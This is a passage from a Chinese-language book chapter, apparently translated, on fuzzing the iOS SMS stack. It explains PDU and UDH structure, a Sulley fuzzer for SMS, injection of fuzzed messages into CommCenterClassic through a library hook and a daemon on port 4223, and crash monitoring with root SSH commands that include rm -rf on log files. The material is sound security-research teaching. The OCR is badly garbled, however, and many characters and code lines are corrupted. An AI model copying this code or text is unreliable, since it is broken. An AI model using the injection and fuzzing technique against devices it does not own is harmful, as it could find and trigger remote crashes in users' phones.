的 数据 中 7 位 字 节 的 数目 。 余 下 的 字 节 就 是 表示 消息 的 7 位 数据 。 

在 本 例 中 ，E8329BFD4697D9EC377D 这 些 字 节 会 解码 为 hellohellot。 

表 6-1 概 括 了 大 家 目前 为 止 所 看 到 的 内 容 。 
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表 6-1 PDU 信 息 














大 小 字 段 大 小 字 段 
1 字 节 长 度 -SMSC 可 变 数据 -发 送 者 
1 字 节 类 型 -SMSC 1 字 节 TP-PID 
可 变 数据 -SMSC 1 字 节 TP-DCS 
1 字 节 DELIVER 7 字 节 TP-SCTS 
1 字 节 长 度 -发 送 者 1 字 节 TP-UDL 
1 字 节 类 型 -发 送 者 可 变 TP-UD 


6.9.3 PDUspy 的 使 用 


在 探索 PDU 数 据 的 世界 时 ，PDUspy ( www.nobbi.com/pduspyhtml ) 可 以 说 是 最 实 月 











的 一 个 








工具 。 但 不 巧 的 是 , 该 工具 只 能 用 于 Windows 操 作 系 统 。 在 创建 和 检查 PDU 时 ,该 工具 是 不 可 或 


缺 的 。 用 PDUspy 对 6.9.2 节 中 分 析 过 的 PDU 进 行 痢 析 的 情况 如 图 6-7 所 示 。 


图 6-7 PDUspy 剖 析 PDU 





大 家 只 需要 按照 图 中 所 示 的 设置 ， 在 Enter message ( 输入 消息 ) 字段 中 输入 PDU，PDUspy 
就 会 解码 该 PDU, 解码 过 程 在 输入 PDU 的 过 程 中 就 开始 了 ! 在 检查 为 SMS 模 糊 测试 生成 的 测试 用 
例 是 否 差 不 多 合法 ， 或 至 少 是 达到 预期 时 ， 该 工具 能 派 得 上 用 场 。 而 在 分 析 引 起 崩溃 的 PDU 时 ， 
PDUspy 也 特别 实用 。 它 通常 会 指出 那些 不 正确 的 字段 ， 这 应 该 能 让 大 家 找到 问题 的 根源 。 有 意 
思 的 是 , 稍 后 要 讨论 的 一 些 以 前 的 OS SMS bug 在 PDUspy 中 会 将 自己 表示 为 异常 ( 具有 讽刺 意味 











的 是 ， 这 也 正 是 PDUspy 处 理 的 )。 
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6.9.4 用 户 数据 头 信息 的 使 用 


之 前 的 例子 是 形式 最 简单 的 SMS 消 息 。 正 如 对 TP-DCS 字 段 的 描述 中 所 暗示 的 ， 还 有 更 复杂 
的 格式 存在 。UDH ( User Data Header， 用 户 数据 头 ) 提供 了 一 种 发 送 控制 信息 〈 而 不 仅仅 是 
告 数据 ) 的 方式 。SMS 消 息 DELIVER 字 段 中 的 标志 表示 存在 这 种 类 型 的 数据 。 

下 面 是 UDH 的 例子 : 

050003000301 

这 一 UDH 数 据 位 于 SMS 消 息 的 通用 数据 字段 ， 也 就 是 TP-UD 字 段 中 。UDH 开 头 的 一 个 字 方 
表明 该 UDH 所 含 的 字 节 数 。 这 个 字段 名 为 UDHL,， 在 这 个 例子 中 是 05。 该 字段 之 后 接着 一 个 或 多 
个 元 素 。 这 些 用 户 数据 头 都 使 用 了 TLV ( Type-Length-Value， 类 型 一 长 度 一 值 ) 文法 。 也 就 是 说 ， 
第 一 个 字 节 是 元 素 的 类 型 。 这 个 字 节 是 IEI ( Information Element Identifier， 信 息 元 素 标识 符 )。 接 
下 来 的 字 节 是 IEDL ( Information Element Data Length， 信 息 元 素数 据 长 度 )。 最 后 就 是 元 素 实际 
的 数据 ， 也 就 是 IED ( Information Element Data， 信 息 元 素数 据 )。 在 这 个 例子 中 ， 类 型 是 00， 长 
度 是 03 ， 而 数据 是 000301。UDH 之 后 接着 的 可 以 是 任意 数据 。 各 分 段 如 表 6-2 所 示 。 


表 6-2 UDH 分 段 




































































大 小 字 段 示例 字 节 
1 字 节 UDHL 05 
1 字 节 IEI 00 
1 字 节 IEDL 03 
可 变 IED 00 03 01 


6.9.5 ”拼接 消息 的 处 理 


仔细 分 析 该 例子 ， 其 中 IEI 是 00， 表 示 这 是 条 具有 8 位 参考 编号 (reference number ) 的 拼接 消 
息 。 该 元 素 类 型 用 于 发 送 长 度 超过 最 大 限制 160 字 节 的 SMS 消 息 。 它 让 较 长 的 消息 可 以 分 成 几 部 
分 ， 装 入 多 条 SMS 消 息 中 ， 再 由 接收 者 重新 整合 起 来 。IED 的 第 一 个 字 节 是 消息 的 参考 编号 ， 它 
是 个 唯一 的 编号 , 用 于 在 接收 者 同时 收 到 多 条 拼接 消息 时 区 分 这 些 消息 。 第 二 个 字 节 表示 本 次 会 
话 中 总 共有 多 少 条 消息 。 最 后 的 字 节 指明 本 条 消息 在 本 次 会 话 中 是 第 几 条 消息 。 在 本 例 中 , 参考 
编号 是 00， 而 且 总 共有 03 条 消息 ， 其 中 这 一 条 消息 是 第 一 条 消息 〈 计数 不 是 从 0 开始 ， 而 是 从 1 
开始 的 )。 利用 消息 拼接 ,理论 上 我 们 可 以 发 送 最 多 由 255 个 部 分 组 成 的 SMS 消 息 ， 其 中 每 个 部 分 
含有 154 字 节 数 据 ， 消 息 的 总 大 小 可 以 达 近 40 000 字 节 。 






















































































6.9.6 ”其 他 类 型 UDH 数 据 的 使 用 


如 图 6-8 所 示 ，iOS 可 以 处 理 若 二 种 不 同 的 IEI 值 。 
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图 6-8 ”逆向 工程 得 出 的 负责 处 理 IEI 值 的 函数 


这 里 ， 我 们 利用 IDA Pro 对 CommCenter 二 进 制 文件 进行 了 逆向 工程 ， 得 到 的 该 函数 会 对 含有 
UDH 的 SMS 消 息 的 IEI 进 行 操作 。 如 果 详 细 了 解 该 函数 , 你 会 发 现 iPhone 可 以 处 理 以 下 几 种 IEI 值 : 
0、1、4、5、0x22、0x24 和 0x25。 在 进行 模糊 测试 时 这 是 很 实用 的 信息 。 

口 00 一 一 拼接 的 短 消息 ，8 位 参考 编号 。 
口 01 一 一 特殊 SMS 消 息 指示 符 (语音 邮件 )。 
口 04 一 一 8 位 寻 址 的 应 用 端口 。 
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口 05 一 一 16 位 寻 址 的 应 用 端口 。 
口 22 一 一 备 选 回复 地 址 。 
口 24、25 一 一 保留 的 。 


* 该 列表 摘自 Gwenael Le Bodic 所 著 的 Mobile Messaging Technologies and Services: SMS, EMS, MMS 。 


这 些 类 型 的 UDH 元 素 中 有 一 种 是 在 语音 邮件 可 用 时 出 现 的 。IEI 值 01 就 表示 这 种 情况 。 该 情 
况 下 的 UDH 数 据 可 能 是 0401020020 这 样 的 。 其 中 ，UDHL 是 04，IEI 是 01，IEDL 是 02， 而 IED 
是 0020。 这 表示 有 0x20 条 语音 邮件 消息 可 用 。 这 不 瘟 为 一 种 惹恼 朋友 的 好 办 法 ， 如 果 说 可 以 向 
他 们 发 送 原始 SMS 数 据 的 话 。 

UDH 的 另 一 个 用 途 是 向 特别 注册 过 的 应 用 发 送 数 据 。 就 像 TCP 具 有 端口 而 且 特 定 的 应 用 程序 
会 绑 定 到 这 些 端口 上 一 样 ， 应 用 程序 也 可 以 监听 特定 UDH 端 口上 的 数据 。 这 里 的 UDH 可 能 是 
06050400000000 这 样 后 面 跟 上 应 用 所 需要 的 任意 数据 。 在 这 个 例子 中 ，UDHL 是 06， 而 IEI 是 
05， 这 表示 应 用 端口 寻 址 使 用 了 16 位 端口 。 接 下 来 的 04 是 IEDL ， 后 面 就 是 端口 号 信息 ， 其 中 前 
面 的 0000 是 源 端口 ， 后 面 的 0000 是 目的 地 端口 。 再 接着 就 是 应 用 专属 的 任何 数据 。 

SMS 消 息 中 的 UDH 数 据 还 有 一 个 用 途 , 就 是 用 于 可 视 语 音 邮 件 。 当 可 视 语音 邮件 到 达 时 , 含 
有 该 邮件 URL 的 SMS 消 息 也 会 到 达 。 这 个 URL 只 能 在 运营 商 网 络 上 人 解析， 如果 提供 一 个 因特网 上 
的 URL, 就 会 尝试 (通过 运营 商 网 络 ) 到 达 该 URL, 但 运营 商 网 络 不 会 允许 进行 完整 的 三 次 握手 。 
不 管 怎 样 ， 这 个 URL 也 是 个 可 以 进行 模糊 测试 的 地 方 。 可 视 语 音 邮 件 是 从 UDH 端 口 0000 发 送 到 
端口 5499 的 ， 其 中 的 文本 就 是 这 个 URL。 该 URL 的 形式 如 下 所 示 : 

allntxacds1l2.attwireless.net:5400?f=0&v=400&m=XXXXXXX&p=&s=5433& 

t=4:XXXXXXX:A: INdyAP36:ms01:client:46173 
其 中 XXXXXXX 是 电话 号 码 ， 在 这 里 我 把 它 隐 去 了 ， 免 得 AT&T 找 我 麻烦 。 

现在 大 家 已 经 看 到 iOS 都 使 用 了 哪些 类 型 的 SMS 数 据 ， 应 该 跃 牙 和 欲 试 ， 想 对 这 些 数据 进行 模 
糊 测试 ， 看 看 能 否 找到 一 些 不 错 的 远程 服务 端 pug 了 。 


6.9.7 用 Sulley 进 行 基于 生成 的 模糊 测试 


本 章 较 早 部 分 介绍 的 例子 使 用 的 都 是 基于 变异 的 模糊 测试 ， 就 是 对 合法 数据 进行 随机 修改 ， 
并 把 修改 过 的 数据 发 送 给 应 用 。 这 在 协议 未 知 时 ( 这 种 情况 也 没 别 的 选择 ) 或 拥有 海量 起 始 输入 
可 供 测 试 时 特别 实用 。 例 如 ， 在 对 .ppt 文 件 进 行 模 糊 测 试 时 ， 从 网 上 下 载 大 量 PPT 用 于 修改 并 不 
是 件 难事 。 而 SMS 消 息 则 不 属于 这 种 情况 。 大 家 也 许 能 找到 一 些 不 同类 型 的 有 效 SMS 消 息 。 不 过 ， 
这 可 能 不 足以 进行 彻底 的 模糊 测试 。 为 了 这 一 目标 ， 大 家 需要 使 用 更 具 针对 性 的 模糊 测试 方法 : 
基于 生成 的 模糊 测试 。 

基于 生成 的 模糊 测试 会 根据 规范 构造 测试 用 例 ， 并 智能 地 构建 输入。 大 家 已 经 看 到 了 SMS 
消息 的 构成 方式 ， 现 在 只 需要 把 这 些 知 识 转化 成 生成 测试 用 例 的 代码 就 行 了 。 为 达到 这 一 目的 ， 
大 家 可 以 使 用 Sulley 模 糊 测试 框架 。 

有 了 Sulley， 我 们 就 有 办 法 准确 表示 组 成 SMS 消 息 的 各 种 数据 。 我 们 还 可 以 用 它 发 送 数据 和 
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监测 数据 。 不 过 在 这 里 大 家 可 以 忽略 这 些 额 外 的 功能 ， 只 需要 利用 Sulley 生 成 测试 用 例 的 功能 。 
就 像 早 期 的 基于 生成 模糊 器 SPIKE ( www.blackhat.com/presentations/bh-usa-02/bh-us-02-aitel 
-spike.ppt ) 那样 ，Sulley 也 使 用 了 基于 块 的 数据 表示 方法 。 大 家 现在 就 可 以 开始 着 手 了 ， 看 看 能 
否 利用 Sulley 提 供 的 原 语 表示 SMSC 地 址 。 对 于 第 一 个 字 节 ， 我 们 需要 用 到 s_size 原 语 。 在 没有 
被 模糊 处 理 时 , 该 原 语 可 以 正确 地 存放 它 所 对 应 的 数据 块 的 长 度 。 因 此 ， 即 便 是 有 超 长 的 数据 字 
段 ，SMSC 地 址 从 文法 上 讲 也 是 正确 的 。 这 就 是 对 协议 的 了 解 能 派 上 用 场 的 地 方 。 如 果 只 是 随机 
地 插入 字 节 ， 程 序 可 能 很 快 就 会 拒 收 这 样 的 无 效 SMS 消 息 ， 因 为 消息 的 长 度 是 错误 的 。 调 用 
s_size 原 语 时 我 们 有 多 种 参数 可 以 选择 ， 大 家 将 会 用 到 以 下 这 些 参数 。 
口 format 该 参数 约束 了 输出 格式 。 可 能 的 值 包 括 string、binary 和 oct。 你 所 需要 的 
是 cct， 即 八 位 组 。 为 进行 SMS 模 糊 测 试 ，Sulley 中 已 经 添加 了 处 理 八 位 组 的 代码 。 
口 length 该 参数 表示 长 度 字段 是 由 多 少 字 节 组 成 的 ， 在 本 例 中 是 1。 
口 math 该 参数 表示 如 何 根 据 数 据 块 的 实际 长 度 计算 出 要 输出 的 长 度 值 。 在 本 例 中 ， 输 出 
是 某 些 字 节 十 六 进 制 表示 对 应 的 文本 的 长 度 。 换 句 话说， 该 数据 块 中 的 字 市 数 ( 该 字 方 
的 值 ) 是 数据 块 实际 字符 串 长 度 的 一 半 ( 每 个 “ 字 节 ”其 实 是 两 个 ASCII 字 符 )。 大 家 可 
以 把 math 参 数 的 值 设置 为 lampda x: x/2 来 表示 这 一 情况 。 
口 fuzzable 该 参数 的 值 表明 是 否 应 对 此 字段 进行 模糊 测试 。 在 对 Sulley 文 件 进行 调试 时 ， 
我 们 可 以 先 将 该 参数 的 值 设 为 False， 在 准备 好 进行 模糊 测试 时 再 把 它 置 为 rrue。 
将 这 些 参数 全 放 在 一 起 ， 你 就 会 得 到 表示 SMSC 地 址 第 一 个 字 节 的 如 下 代码 : 
s_size("smsc number", format="oct", length=1, math=lambda x: x/2) 
将 字 节 放 进 Sulley 数 据 块 中 ,你 就 可 以 指定 此 次 长 度 计算 中 要 使 用 这 些 字 节 。 这 个 数据 块 不 
一 定 要 出 现在 对 应 s_size 所 在 位 置 的 附近 ,不 过 ,在 本 例 中 ,数据 块 是 紧 随 s_size 之 后 的 。 Sulley 
代码 现在 就 是 下 面 这 样 了 : 
s_size("smsc number", format="oct", length=1, math=lambda x: x/2) 
if s_block start("smsc number"): 

























































































Ss_block_end() 

因为 可 能 有 多 个 s_size 原 语 和 数据 块 , 所 以 我 们 可 以 通过 为 s_size 和 数据 块 使 用 相同 的 字 
符 串 建立 连接 。 接 下 来 是 数字 的 类 型 。 这 是 个 单字 节 的 数据 ， 因 此 要 使 用 s_byte 原 语 。 这 个 原 
语 可 选择 的 参数 与 s_size 的 可 选 参数 类 似 。 大 家 还 可 以 利用 name 选 项 为 字段 命名 ， 从 而 提高 文 
件 的 可 读 性 : 

Ss_byte(0x91, format="oct", name="typeofaddress") 

第 一 个 (也 是 唯一 一 个 不 可 选 的 ) 参数 是 该 字段 的 默认 值 。Sulley 会 对 要 进行 测试 的 第 一 个 
可 模糊 测试 字段 进行 模糊 测试 。 在 重复 尝试 要 为 该 字段 尝试 的 全 部 值 时 ， 其 他 字段 都 保持 不 变 ， 
继续 具有 它们 的 默认 值 。 因 此 ， 在 本 例 中 ， 在 不 对 typeofaddress 字 节 进 行 模 糊 测试 时 ， 它 的 
值 一 直 是 91。 这 样 的 结果 就 是 Sulley 永 远 都 不 会 找到 所 谓 的 2x2 漏 洞 ( 就 是 那些 要 求 同 时 改变 两 
个 字段 才能 找到 的 漏洞 )。 
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SMSC 地 址 的 最 后 一 个 字段 是 实际 的 电话 号 码 。 大 家 可 以 选择 将 其 表示 为 一 串 s_byte, 不 过 
就 算是 在 模糊 测试 时 ， 每 个 s_byte 的 长 度 也 一 直 是 1。 如 果 想 让 该 字段 具有 不 同 的 长 度 ， 你 就 需 
要 使 用 s_string 原 语 。 在 进行 模糊 测试 时 ， 该 原 语 会 被 很 多 长 度 各 异 的 不 同 字符 串 代替 。 不 过 
这 样 做 存在 一 些 问题 。 其 中 一 个 问题 是 PDU 数 据 也 必须 由 十 六 进 制 的 ASCII 值 组 成 。 大 家 可 以 将 
其 封装 到 数据 块 中 ， 并 使 用 可 选 的 encoder 字 段 向 Sulley 传 递 这 一 信息 。 


if s_block start ("SMSC data", encoder=eight bit encoder): 




















s_string("\x94\x71\x06\x00\x40\x34", max_ len = 256, fuzzable=True) 


s_block_end() 
这 里 的 eight_bit_encoder 是 用 户 提供 的 函数 ， 它 接受 一 个 字符 串 并 返回 一 个 字符 串 ， 在 


本 例 中 就 








def eight bit encoder (string): 


ret = "'" 

strlen = len(string) 

for i in range(0,strlen): 
temp = "%02x" % ord(string[i]) 
ret += temp.upper() 

return ret 





该 函数 接受 任意 的 字符 串 ， 并 将 它们 表示 为 所 需 的 形式 。 大 家 可 能 已 经 注意 到 了 , 这 里 还 有 
个 max_len 选 项 。Sulley 的 模糊 测试 库 包含 一 些 特别 长 的 字符 串 ， 有 时 候 会 有 几 千 字 方 那么 长 。 


而 我 们 在 这 里 要 进行 模糊 测试 的 内 容 最 大 长 度 只 是 160 字 节 ， 因 此 生成 超 长 的 测试 用 例 是 没有 任 
何 意义 的 。max_len 表 明了 进行 模糊 测试 时 所 使 用 字符 串 的 最 大 长 度 。 6 

















下 面 是 Sulley 的 协议 文件 ， 用 于 对 8 位 编码 SMS 消 息 的 所 有 字段 进行 模糊 测试 。 想 了 解 更 多 
Sulley SMS 文 件 示例 , 请 参考 www.mulliner.org/security/sms/feed/bh.tar.gz。 这 些 文件 中 包含 了 不 同 
的 编码 类 型 ， 而 且 有 具备 不 同 UDH 信 息 元 素 的 例子 。 


def eight bit encoder (string): 

















ret = "'"' 

strlen = len(string) 

for i in range(0,strlen): 
temp = "%02x" % ord(string[i]) 
ret += temp.upper() 

return ret 


s_initialize("query") 


s_size("SMSC number", format="oct", length=1, math=lambda x: x/2) 
if s_block_ start ("SMSC number"): 


s_byte(0x91, format="oct", name="typeofaddress") 

if s_block start("SMSC data", encoder=eight bit encoder): 
s_string("\x94\x71\x06\x00\x40\x34", max_ len = 256) 

s_block_end() 


s_block_end() 


s_byte(0x04, format="oct", name="octetofsmsdeliver") 


s_size("from number", format="oct", length=1, math=lambda x: x-3) 
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if s_block_ start ("from number"): 
s_byte(0x91, format="oct", name="typeofaddress_from") 
If s_block start("abyte2", encoder=eight bit encoder): 
s_string("\x94\x71\x96\x46\x66\x56\xf8", 
s_block_end() 
Ss_block_end() 


max_len = 256) 


S_byte(0x0， 
S_byte(0x04， 


format="oct", 
format="oct", 


name="tp_pid") 
name="tp_dcs") 


if s_block_ start("date"): 


式 。 


s_block_end() 


s_byte(0x90, 
S_byte(0x10， 
s_byte(0x82, 
S_byte(0x1L1， 
S_byte(0x42 ， 
S_byte(0x15， 
S_byte(0x40 ， 


format="oct") 
format="oct") 
format="oct") 
format="oct") 
format="oct") 
format="oct") 
format="oct") 


if s_block start("eight bit"): 


S_S 


ize("message eight", format="oct", length=1, math=lambda x: x / 2， 


fuzzable=True) 


了 二 


S_block_start("message_eight'") : 
if s_block_start("text_elight" ,encodqer=elght_bit_encodqer) : 
SsS_Sstring("hellohello"，max_len = 256) 
s_block_end() 


s_block_end() 
s_block_end() 


fuzz_file = 
hb ly hs I Ke 
fuzz_file.f 











Session_ file() 
onnect (s_get ("gquery")) 
1 党 骂 导 
































这 将 会 在 stdaout 上 生成 超过 2000 条 模糊 处 理 过 的 SMS 消 息 。 

$ python pdu_simple.py 

11:08.37] current fuzz path: -> query 

11:08.37] fuzzed 0 of 2128 total cases 

T10837 fuzzing 1 of 2128 
0700947106004034040D91947196466656F80004901082114215400A68656C6C6F 
68656C6C6P 

L1308.37 fuzzing 2 of 2128 
0701947106004034040D91947196466656F80004901082114215400A68656C6C6F 
68656C6C6F 

FLO08537 fuzzing 3 of 2128 
0702947106004034040D91947196466656F80004901082114215400A68656C6C6F 
68656C6C6F 

iL:08.37 fuzzing 4 of 2128 
0703947106004034040D91947196466656F80004901082114215400A68656C6C6F 
68656C6C 





最 后 一 步 就 是 对 这 些 输 出 进行 转换 , 生成 便于 我 们 尚未 编写 的 这 个 模糊 器 解析 进行 解析 的 形 
为 了 让 一 切 变 得 更 为 一 般 化 ， 我 们 可 以 允许 测 





试用 例 含有 一 条 以 上 的 SMS 消 息 。 这 样 一 来 ， 
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测试 用 例 不 仅 包含 了 随机 的 错误 , 也 可 以 测试 拼接 SMS 消 息 到 达 次 序 被 打 乱 这 样 的 情况 。 考 虑 到 
这 一 点 ， 大 家 可 以 对 该 工具 的 输出 运行 如 下 脚本 ， 让 它 变 成 这 样 的 格式 : 
import sys 


for line in sys.stdin: 
print line+"[end casel]" 


在 本 例 中 , 大 家 可 以 将 各 个 PDU 分 别 视 作 独立 的 测试 用 例 , 不 过 这 样 一 来 就 可 能 要 和 忽略 一 些 
更 为 复杂 的 测试 用 例 。 














然后 ， 大 家 可 以 运行 如 下 内 容 ， 生 成 满 是 模糊 测试 测试 用 例 的 非常 易于 解析 的 文件 。 
$ python pdu_simple.py | grep -v '\[' | python convert.py 
0700947106004034040D91947196466656F80004901082114215400A68656C6C6F 
68656C6C6F 

[end case] 
0701947106004034040D91947196466656F80004901082114215400A68656C6C6F 
68656C6C6F 

[end case] 
0702947106004034040D91947196466656F80004901082114215400A68656C6C6F 
68656C6C6F 

[end case] 


注意 , 在 这 些 由 Sulley 生 成 的 PDU 中 ,有 一 些 可 能 没 法 通过 真正 的 蜂窝 网 络 发 送 。 例 如 , SMSC 
可 能 设置 了 SMSC 地 址 ， 而 攻击 者 没 法 控制 这 个 值 。 或 者 ， 也 许 运 营 商 会 对 它 传 送 的 数据 进行 完 
整 性 检查 ,并 且 只 人 允许 某 些 特殊 字段 具有 特定 的 值 。 不 管 是 哪 种 情况 ,所 生成 的 测试 用 例 都 有 可 
能 仅 部 分 能 够 在 运营 商 网 络 上 发 送 。 我 们 必须 确定 这 些 甬 溃 都 是 由 能 在 真实 的 运营 商 网 络 上 传送 
的 SMS 消 息 造 成 的 。 
































6.9.8 SMS iOS 注 入 


在 拿 到 大 量 模糊 处 理 过 的 SMS 消 息 后 ， 你 还 需要 有 办 法 将 它们 传送 到 iPhone 上 以 进行 测试 。 
利用 真实 的 运营 商 网 络 , 将 它们 从 一 部 设备 发 送 到 另 一 部 设备 就 能 达到 这 一 目的 。 这 样 的 过 程 涉 
及 将 测试 用 例 从 一 部 设备 通过 SMSC 发 送 到 测试 设备 上 上。 不过， 这样 做 主要 有 下 面 几 个 缺点 。 其 
一 就 是 发 短信 是 要 收费 的 , 发 得 多 了 这 笔 支出 也 是 挺 大 的 。 另 一 个 原因 就 是 运营 商会 察觉 到 这 些 
测试 ,特别 是 注意 到 这 些 测试 用 例 。 除 此 之 外 , 运营 商 还 可 能 采取 行动 阻止 测试 ， 比 如 说 限制 消 
息 的 传送 。 还 有 , 模糊 处 理 过 的 消息 还 可 能 会 导致 运营 商 的 电话 服务 设备 月 演 ， 从 而 引发 法 律 问 
题 。 而 下 面 要 介绍 的 方法 首先 是 由 Mulliner 和 Miller 针 对 iOS 3 描述 的 ( www.blackhat. 
com/presentations/bh-usa-09/MILLER/BHUSA09-Miller-FuzzingPhone-PAPER.pdf )， 而 我 们 在 这 里 
针对 iOS 5 对 其 进行 了 更 新 。 这 要 假定 将 自己 置 于 调制 解 调 器 和 应 用 处 理 恬 之 间 ， 在 设备 上 向 这 
两 者 之 间 的 串 行 连接 注入 SMS 消 息 。 此 方法 有 很 多 好 处 ， 其 中 包括 运营 商 (基本 上 ) 不 会 知道 这 
种 测试 在 进行 ， 消息 能 够 以 非常 快 的 速率 发 送 , 不 会 产生 话费 成 本 ， 而 且 出 现在 应 用 处 理 器 上 的 
消息 与 通过 运营 商 网 络 到 达 的 真实 SMS 消 息 是 一 模 一 样 的 。 

设备 上 的 SMS 消 息 是 由 CommCenter 或 CommCenterClassic 进 程 处 理 的 ( 取决 于 使 用 哪 种 设 
备 )。 这 些 CommCenter 进 程 与 调制 解 调 器 之 间 的 连接 由 若干 虚拟 串 行 线路 组 成 。 它 们 在 iOS 2 和 























































































































图 灵 社 区 会 员 cham1985 专 享 尊重 版 权 








146 第 6 章 对 iOS 应 用 进行 模糊 测试 





iOS 3 中 分 别 由 /gdev/dlci.h5-baseband.[0-15] 和 /dev/dlci.spi-baseband.1[10-15] 表 
示 。 在 iOS 5 中 ,它们 的 形式 是 /dev/dlci .spi-baseband.*。SMS 消 息 所 需 的 两 种 虚拟 设备 分 
别 是 /dev/dlci.spi-baseband.sms 和 /dev/dlci.spi-baseband.1low。 

要 注入 创建 的 SMS 消 息 ， 我 们 就 需要 进入 CommCenterClassic 进 程 。 我 们 会 利用 预先 加 载 库 
的 方式 将 库 注 入 该 进程 ,从 而 达到 这 一 目的 。 该 库 会 提供 新 版 本 的 open (2) 、read (2) 和 write (2) 
函数 。 新 版 的 open 会 检查 之 前 提 过 的 处 理 SMS 消 息 的 两 条 串 行 线路 是 否 处 于 打开 状态 。 如 果 是 ， 
它 就 会 打开 UNIX 套 接 字 /tmp/fuzz3 .sock 或 /tmp/fuzz4.sock， 连 接 到 该 套 接 字 ， 并 把 该 文 
件 描述 符 返 回 给 请 求 文件 的 设备 。 如 果 是 要 对 其 他 文件 调用 open， 那 么 真实 版 本 的 open ( 可 在 
dlsym 中 找到 ) 会 被 调用 。 这 样 的 结果 就 是 ， 对 于 那些 我 们 不 关注 的 文件 或 设备 ， 执 行 的 是 对 标 
准 open 的 调用 ， 而 对 于 想 要 冒充 的 两 条 串 行 线路 来 说 ， 我 们 不 是 要 打开 真正 的 设备 ， 而 是 要 返 
回 对 应 UNIX 套 接 字 的 文件 描述 符 ; 我 们 可 以 随意 读 写 该 描述 符 。 拦 截 read 和 write 函数 是 出 于 日 
志 记 录 和 调试 的 目的 ， 与 SMS 注 入 没有 关系 。 

接着 , 我 们 要 创建 一 个 名 为 injectord 的 守护 进程 , 它 会 打开 通 向 所 需 的 两 个 串 行 设备 的 连接 ， 
还 会 打开 通 向 UNIX 套 接 字 ( 虚拟 串 行 端口 ) 的 连接 。 然 后 ， 该 守护 进程 就 会 把 从 一 个 文件 描述 
符 读 取 的 数据 原原本本 地 复制 到 另 一 个 文件 描述 符 , 扮演 着 中 间 人 的 角色 。 此 外 ， 它 还 会 在 端口 
4223 上 打开 一 个 网 络 套 接 字 。 当 它 在 此 端口 上 接收 数据 时 , 该 网 络 套 接 字 会 把 数据 转播 给 这 里 提 
到 的 UNIX 套 接 字 。 最 终 的 效果 就 是 ， 当 CommCenterClassic 打 开 这 些 串 行 连 接 时 ， 实 际 上 会 打开 
一 个 UNIX 套 接 字 ， 而 这 个 UNIX 套 接 字 大 多 数 时 候 都 表现 得 像 是 通 向 调制 解 调 器 的 连接 。 不 过 ， 
通过 向 端口 4223 发 送 数据 ， 大 家 可 以 注入 数据 ， 而 且 这 些 数据 看 起 来 就 像 是 来 自 调制 解 调 器 的 。 

一 旦 这 个 注入 程序 到 位 ,给 定 PDU 格 式 的 SMS 消 息 ,， 下面 的 Python 函数 就 会 将 正确 格式 的 数 
据 发 送 到 会 把 这 些 数据 注入 串 行 线路 的 守护 进程 。CommCenterClassic 的 表现 就 像 这 些 消 息 真 是 
通过 运营 商 网 络 到 达 的 那样 。 


def send pdul(ip address, line): 
leng = (len(line) / 2) - 8 
buffer = "\n+CMT: ,%d\n%s\n" % (leng, line) 
S = socket.socket (socket.AF_INET, socket.SOCK_ STREAM) 
s.connect((ip_addresss, 4223)) 
s.send(buffer) 
s.close() 


这 样 我 们 就 可 以 不 花 钱 把 SMS 消 息 发 送 给 设备 了 。 这 些 消息 可 以 以 非常 快 的 速度 传送 , 能 达 
到 每 秒 很 多 条 的 传送 量 。 




















































































































6.9.9 SMS 的 监测 


大 家 现在 已 经 几乎 掌握 了 对 iOS 的 SMS 实 现 进行 模糊 测试 所 需要 的 一 切 知 识 ， 不 过 最 后 还 要 
了 解 监测 。 最 起 码 ， 大 家 需要 检查 CommCenterClassic ( 和 其 他 进程 ) 的 崩 江 。 要 做 到 这 一 点 ， 
你 就 需要 关注 册 演 报告 器 的 日 志 。 

在 发 送 测试 用 例 之 前 ,我 们 要 通过 SSH 连 接 设备 ,清除 之 前 问题 的 日 志 。 请 确保 设置 的 是 公 
铀 认证 ， 这 样 一 来 访问 进行 模糊 测试 的 机 器 就 不 需要 密码 了 : 
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def clean logs (ip): 


commcenter = 
'/private/var/logs/CrashReporter/LatestCrash.plist' 

springboard = 
'/private/var/mobile/Library/Logs/CrashReporter/LatestCrash.plist' 

command = 'ssh root@'+ip+' "rm -rf %s 2>/dev/null; rm -rf 
$s 2>/dev/null"' % (commcenter, springboard) 

Cc = os.popen (command) 








这 里 会 对 SpringBoard 和 CommCenter 进 行 检 查 ， 因 为 实际 显示 消息 的 它们 在 进行 模糊 测试 时 
有 时 会 衣 泪 。 注 意 ， 日 志 是 保存 在 iPhone 上 的 ， 而 没有 保存 在 运行 模糊 器 的 桌面 计算 机 上 ， 这 也 
是 需要 利用 SSH 查 找 和 读 取 它们 的 原因 所 在 。 在 运行 了 测试 用 例 后 ,我们 有 必要 检查 日 志 中 是 否 
出 现 了 什么 内 容 。 


def check for _ crash(test number, ip): 
time.sleep (3) 
commcenter = 
'/private/var/logs/CrashReporter/LatestCrash.plist' 
springboard = 
'/private/var/mobile/Library/Logs/CrashReporter/LatestCrash.plist' 
command = 'ssh root@'+ip+' "cat %s 2>/dev/null; cat %s 
2>/dev/null"' % (commcenter, springboard) 
C = os.popenl(command) 
crash = C.read() 
if crash: 
clean logs() 
print "CRASH with %d" % test_ number 
print crash 
DELNntE "VMNANA® 
time.sleep (60) 








else: 
BE YY 
c.close!() 


大 家 可 以 保持 这 个 状态 并 检查 是 否 出 现 崩 演 。 不 过 ， 为 了 完全 确定 CommCenterClassic 仍 能 
恰当 地 处 理 传人 的 消息 , 大 家 应 该 更 谨慎 一 些 。 在 各 个 模糊 测试 测试 用 例 之 间 , 大 家 还 应 该 发 送 
ee 在 进一步 进行 模糊 测试 之 前 , 大 家 可 以 试 着 验证 设备 成 功 地 接收 了 这 些 
消息 。 要 做 到 这 一 点 ， 你 只 需 对 CommCenterClassic 用 来 存储 SMS 消 息 的 sqlite3 数 据 库 进 行 查询 : 


# sqlite3 /private/var/mobile/Library/SMS/sms.db 
SQLite version 3.7.7 

Enter ".help" for instructions 

sqlite> .tables 

_SqliteDatabaseProperties message 

group._ member msg_group 

madrid_ attachment msg_pieces 

madrid_ chat 


这 两 个 以 madrid 开 头 的 表 是 对 多 媒体 消息 进行 处 理 的 ,并 且 含有 通过 MMS 发 送 的 那些 镜像 的 
文件 名 。 对 于 SMS 而 言 ， 最 重要 Se 为 message。 在 该 表 中 有 几 列 很 有 意思 的 内 容 ， 其 中 之 一 
是 叫 作 ROWID 的 递增 整数 ， 另 一 个 是 用 于 存放 消息 文本 的 text。 
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在 越狱 过 的 iPhone 上 运行 以 下 命令 ， 你 就 会 看 到 该 设备 接收 到 的 最 后 一 条 SMS 消 息 的 内 容 : 


# sqlite3 -line /private/var/mobile/Library/SMS/sms.db 'select 
